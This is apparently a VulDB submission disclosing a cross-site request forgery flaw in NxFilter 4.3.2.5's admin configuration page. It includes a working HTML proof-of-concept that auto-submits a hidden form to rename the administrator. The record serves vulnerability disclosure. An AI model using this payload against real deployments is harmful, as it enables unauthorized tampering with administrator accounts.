Submit #249432: Nxfilter NxFilter 4.3.2.5 4.3.2.5 CSRF

Title: Nxfilter NxFilter 4.3.2.5 4.3.2.5 CSRF

Description: A CSRF is present in https://APP.COM/config,admin.jsp where a malicious user can change the username of the administrator through a CSRF. If the Admin clicks on the link, his name can be changed to the name the hacker wants. Exploit in HTML:

```html
<!DOCTYPE html>
<html lang="en">
<head>
</head>
<body>
    <form id="configForm" action="https://192.168.0.134/config,admin.jsp" method="POST">
        <!-- Form fields -->
        <input type="hidden" name="actionFlag" value="update">
        <input type="text" name="admin_name" value="hacker" style="display: none;"> <!--name here-->
        <!-- Button to submit the form -->
        <button type="submit">Enviar Requisição</button>
    </form>
</body>
<script>
    document.getElementById('configForm').submit();
</script>
</html>
```

Source: ⚠️ https://APP.COM/config,admin.jsp
User: 0xgordo (UID 50709)
Submission: 08/12/2023 17:26 (3 years ago)
Moderation: 17/12/2023 09:25 (9 days later)
Status: Accepted
VulDB Entry: 248266 [Jahastech NxFilter 4.3.2.5 /config,admin.jsp admin_name cross-site request forgery]
Points: 17
